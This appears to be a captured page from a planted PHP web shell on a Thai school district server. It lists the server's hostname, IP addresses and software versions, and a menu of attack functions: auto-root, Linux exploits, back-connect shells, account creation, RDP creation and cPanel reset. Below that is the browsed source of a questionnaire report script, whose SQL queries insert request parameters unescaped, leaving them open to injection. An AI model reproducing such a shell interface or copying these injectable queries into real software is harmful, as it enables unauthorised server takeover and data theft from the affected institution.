Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
questionnaire /
school /
[ HOME SHELL ]
Name
Size
Permission
Action
sch_answer_qtn.php
26.11
KB
-rw-r--r--
sch_report1.php
13.2
KB
-rw-r--r--
sync.php
3.79
KB
-rw-r--r--
sync.php.bak
3.79
KB
-rw-r--r--
upload_1.php
7.85
KB
-rw-r--r--
upload_2.php
1.46
KB
-rw-r--r--
upload_2_2.php
1.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sch_report1.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DMSS</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="../../../css/mm_training.css" type="text/css" /> </head> <?php require_once "../../../amssplus_connect.php"; require_once "../../../mainfile.php"; require_once "sync.php"; $officer=$remote_user_id; $user_school=$remote_user_office; require_once "../time_inc.php"; if(!(isset($_REQUEST['index']))){ $index=""; } else{ $index=$_REQUEST['index']; } if($index==2){ require_once "upload_2_2.php"; } if($index==4){ $qtn_use_id=$_REQUEST['qtn_use_id']; echo "<form id='frm1' name='frm1'>"; ?><BR> <!-- *************************************** เก็บค่าตัวแปร --> <?php echo "<table border='0' width='75%' align='center'><tr><td align='right'>"; echo "<INPUT TYPE='button' name='smb2' value='<<กลับหน้าก่อน' onclick='goto_url(2)'>"; echo "</td></tr></table>"; ?> <TABLE border="1" width="75%" align="center" style="border-collapse: collapse"> <tr><td colspan="2" valign="top"> <TABLE cellpadding="5" cellspacing="5" border="0" width="100%" align="center"> <TR bgcolor="#000000" height="30"> <TD colspan="10" align=center style="font-family:Tahoma; font-size:10pt;"><font color="#FFFFFF"><b>ชื่อแบบสอบถาม</b> : <?php $sql="select * from questionnaire_use_qtn_name where qtn_use_id='$qtn_use_id' limit 0,1"; $result=mysqli_query($connect,$sql); while($row=mysqli_fetch_array($result)){ /////////////////// ชื่อ template $qtn_name=$row['qtn_use_name']; $qtn_id=$row['qtn_id']; $qtn_desc=$row['qtn_desc']; $type=$row['type']; if($type==1){ $type_text="(แบบสอบถามรายบุคคล)"; } else{ $type_text="(แบบสอบถามรายโรงเรียน)"; } echo " $qtn_name $type_text</td>"; echo "</tr>"; echo "<tr><td colspan='10' align='left'>"; echo "<b>คำชี้แจง</b>  $qtn_desc"; echo "</td></tr>"; echo "<tr><td colspan='2' valign='top'>"; ///////////////////////////////////////////////// ///////////////////////////////////////////////// $sql2="select * from questionnaire_qq where qtn_id='$qtn_id' order by order_id ,qtn_qq_id"; $result2=mysqli_query($connect,$sql2); $i=0; $k=0; while($row2=mysqli_fetch_array($result2)){ /////////////////////////// ชื่อคำถามที่ $qtn_qq_id=$row2['qtn_qq_id']; // ตรวจรายละเอียดแต่ละข้อ $sql_44="select * from questionnaire_use_qtn where (qtn_use_id='$qtn_use_id') and (qtn_qq_id='$qtn_qq_id')"; $dbquery44=mysqli_query($connect,$sql_44); $result44=mysqli_fetch_array($dbquery44); if($result44['school']=='no_sch'){ continue; } $member_grp=0; if($result44['school']>0){ $sql_grp= "select * from questionnaire_school_in_group where (grp_id='$result44[school]') and (school_id='$user_school')"; $dbquery_grp=mysqli_query($connect,$sql_grp); $member_grp=mysqli_num_rows($dbquery_grp); if($member_grp<1){ continue; } } //จบคัดกรองรายข้อ $i++; echo "<TABLE id='tb_q' cellpadding='5' cellspacing='2' border='0' width=100%>"; echo "<TR bgcolor='#5e5e5e' height='30'>"; echo "<TD colspan='8' align='left' style='font-family:Tahoma; font-size:10pt;'><font color='#FFFFFF'><b> คำถามที่$i $row2[2]"; // มีเอกสาร $sql_upload="select * from questionnaire_upload where qtn_use_id='$qtn_use_id' and qtn_qq_id='$qtn_qq_id' "; $dbquery_upload=mysqli_query($connect,$sql_upload); $upload_num=mysqli_num_rows($dbquery_upload); if($upload_num>=1){ echo " <a href=?qtn_use_id=$qtn_use_id&qtn_qq_id=$qtn_qq_id&index=2><img src=../../../images/admin/book.gif alt='เอกสารประกอบการรายงาน' border='0' target='_blank'><font size='1' color='#FFFFFF'>[เอกสารประกอบ]</font></a>"; } echo "</td>"; //ส่วนของการแสดงuploade_file if($result44['upload_file']=='1'){ echo "<td width='20' align='center'><a href=?option=questionnaire&task=main/upload_2&qtn_use_id=$qtn_use_id&qtn_qq_id=$qtn_qq_id><img src=../../../images/icon/arrow_up.gif alt='ข้อนี้สามารถ Upload ได้' border='0' target='_blank'></a></td>"; } else { echo "<td width='20'> </td>"; } echo "</tr>"; //เลือกตัวแปร $sql3="select * from questionnaire_qq_member where qtn_qq_id = $qtn_qq_id order by qtn_qq_m_id"; $result3=mysqli_query($connect,$sql3); $j=0; $count = mysqli_num_rows($result3); while($row3=mysqli_fetch_row($result3)){ ///////////////////////////////// ตัวเลือกกี่ข้อ ก ข $j++; $qtn_qq_m_id = $row3[0]; $qtn_qq_m_name=$row3[2]; $qtn_qq_m_num=$row3[3]; $min = $row3[4]; $max = $row3[5]; $qtn_qq_m_total = $row3[6]; $qtn_op_id=$row3[7]; echo "<tr><td valign=top align='left'><b> $j) $qtn_qq_m_name </b></td></tr>"; echo "<tr><td align='left'>"; if(($qtn_op_id==1) or ($qtn_op_id==2) or ($qtn_op_id==3) or ($qtn_op_id==4)){ if($type==1){ $sql_13="select * from questionnaire_answer where (qtn_use_id='$qtn_use_id') and (qtn_qq_id='$qtn_qq_id') and (qtn_qq_m_id='$qtn_qq_m_id') and (user_id='$officer')"; } else{ $sql_13="select * from questionnaire_answer where (qtn_use_id='$qtn_use_id') and (qtn_qq_id='$qtn_qq_id') and (qtn_qq_m_id='$qtn_qq_m_id') and (school_code='$user_school')"; } $dbquery_13=mysqli_query($connect,$sql_13); $result_answer = mysqli_fetch_array($dbquery_13); $qtn_value1=$result_answer['qtn_value1']; $qtn_value2=$result_answer['qtn_value2']; $qtn_value3=$result_answer['qtn_value3']; $qtn_value4=$result_answer['qtn_value4']; } if($qtn_op_id==1){ echo " <INPUT TYPE='text' NAME='$qtn_qq_id$qtn_qq_m_id' value='$qtn_value1' onKeyDown='DigitOnly();'> $qtn_qq_m_num"; } else if($qtn_op_id==2){ echo " <INPUT TYPE='text' NAME='$qtn_qq_id$qtn_qq_m_id' value='$qtn_value2'>"; }else if($qtn_op_id==3){ echo " <TEXTAREA NAME='$qtn_qq_id$qtn_qq_m_id' ROWS='7' COLS='50'>$qtn_value3</TEXTAREA>"; }else if($qtn_op_id==4){ $sql4="select * from questionnaire_qq_member_other where qtn_qq_m_id=$qtn_qq_m_id order by qtn_qq_mo_id"; $result4=mysqli_query($connect,$sql4); while($row4=mysqli_fetch_row($result4)){ /////////////////////////// ชื่อ Radio $qtn_qq_mo_id = $row4[0]; if($qtn_qq_mo_id==$qtn_value4){ $select4="checked"; } else{ $select4=""; } echo " <INPUT TYPE='$row4[3]' NAME='$qtn_qq_id$qtn_qq_m_id' value='$qtn_qq_mo_id' $select4>$row4[2]<br>"; } } else if($qtn_op_id==5){ $sql5="select * from questionnaire_qq_member_other where qtn_qq_m_id=$qtn_qq_m_id order by qtn_qq_mo_id"; $result5=mysqli_query($connect,$sql5); $k=0; while($row5=mysqli_fetch_row($result5)){ /////////////////////////// $qtn_qq_mo_id = $row5[0]; if($type==1){ $sql_55="select * from questionnaire_answer where (qtn_use_id='$qtn_use_id') and (qtn_qq_id='$qtn_qq_id') and (qtn_qq_m_id='$qtn_qq_m_id') and (qtn_qq_mo_id='$qtn_qq_mo_id') and (user_id='$officer')"; } else{ $sql_55="select * from questionnaire_answer where (qtn_use_id='$qtn_use_id') and (qtn_qq_id='$qtn_qq_id') and (qtn_qq_m_id='$qtn_qq_m_id') and (qtn_qq_mo_id='$qtn_qq_mo_id') and (school_code='$user_school')"; } $dbquery_55=mysqli_query($connect,$sql_55); $result_answer = mysqli_fetch_array($dbquery_55); $qtn_value5=$result_answer['qtn_value5']; if($qtn_qq_mo_id==$qtn_value5){ $select5="checked"; } else{ $select5=""; } echo " <INPUT TYPE='$row5[3]' NAME='$qtn_qq_id$qtn_qq_m_id$qtn_qq_mo_id' $select5>$row5[2]<br>"; $k++; } } echo " </td>"; } echo "</tr>"; echo "</table>"; } ////////////////////////// echo "</td></tr>"; } ?> <tr><td colspan="2" align="center"> </TABLE> </td></tr> <TR bgcolor="#AEB6BF" height="10"><TD align="center" style="font-family:Tahoma; font-size:10pt;"></TD></TR> </TABLE> <?php echo "<br>"; echo "<input type='hidden' name='remote_user_office' value='$remote_user_office'>"; echo "<input type='hidden' name='remote_user_id' value='$remote_user_id'>"; echo "<input type='hidden' name='remote_login_status' value='$remote_login_status'>"; echo "</form>"; } if(!($index==4 or $index==2)){ echo "<br/>"; echo "<form id='frm1' name='frm1'>"; echo "<TABLE cellpadding='5' cellspacing='5' border='0' width='90%' align='center'>"; echo "<TR bgcolor='#E6E6E6' height='30'>"; echo "<TD colspan=2 align='center'><B>รายงาน</B></TD></TR>"; echo "<TR><TD colspan='2' align='center'>เลือกแบบสอบถาม "; echo "<select name='qtn_use_id'>"; $sql= "select * from questionnaire_use_qtn_name order by qtn_use_id desc"; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)){ $qtn_use_id = $result['qtn_use_id']; $start= $result['start']; $start= thai_date_3($start); $stop= $result['stop']; $stop= thai_date_3($stop); $type= $result['type']; $show=0; //ตรวจสอบว่าใช้กับโรงเรียนนี้หรือไม่ $sql_1= "select * from questionnaire_use_qtn where qtn_use_id='$qtn_use_id'"; $dbquery_1=mysqli_query($connect,$sql_1); //มีการกำหนดรายละเอียดแบบสอบถามหรือไม่ $count_1 = mysqli_num_rows($dbquery_1); // ไม่มีการกำหนดรายละเอียดแบบสอบถามให้แสดงรายชื่อแบบสอบถาม if($count_1==0){ $show=1; } //มีการกำหนดกลุ่มหรือไม่ แล้วโรงเรียนเป็นสมาชิกกลุ่มหรือไม่ While ($result_1 = mysqli_fetch_array($dbquery_1)){ $school=$result_1['school']; if($school>=1){ $sql_grp= "select * from questionnaire_school_in_group where (grp_id='$school') and (school_id='$user_school')"; $dbquery_grp=mysqli_query($connect,$sql_grp); $count_grp = mysqli_num_rows($dbquery_grp); if($count_grp>=1){ $show=1; } } } //ใช้กับทุกโรงเรียนหรือไม่ $sql_2= "select * from questionnaire_use_qtn where (qtn_use_id='$qtn_use_id') and (school='all_sch')"; $dbquery_2=mysqli_query($connect,$sql_2); $count_2 = mysqli_num_rows($dbquery_2); if($count_2>=1){ $show=1; } //จบตรวจสอบว่าใช้กับโรงเรียนนี้หรือไม่ if($show==1){ echo "<option value='$result[qtn_use_id]'>$result[qtn_use_name]</option>"; } } echo "</select>" ; echo "</TD></TR>"; echo "</TABLE>"; echo "<br>"; echo "<div align='center'>"; echo "<Input Type='Submit' Value='ตกลง' onclick='goto_url(1)'>"; echo "</div>"; echo "<input type='hidden' name='remote_user_office' value='$remote_user_office'>"; echo "<input type='hidden' name='remote_user_id' value='$remote_user_id'>"; echo "<input type='hidden' name='remote_login_status' value='$remote_login_status'>"; echo "</form>"; } ?> <script> function callfrm(dest) { frm1.target = "_self" frm1.action = dest frm1.method = "POST" frm1.submit() } function goto_url(val){ if(val==1){ callfrm("?index=4"); } else if(val==2){ callfrm("?index=1"); } } </script>
Close
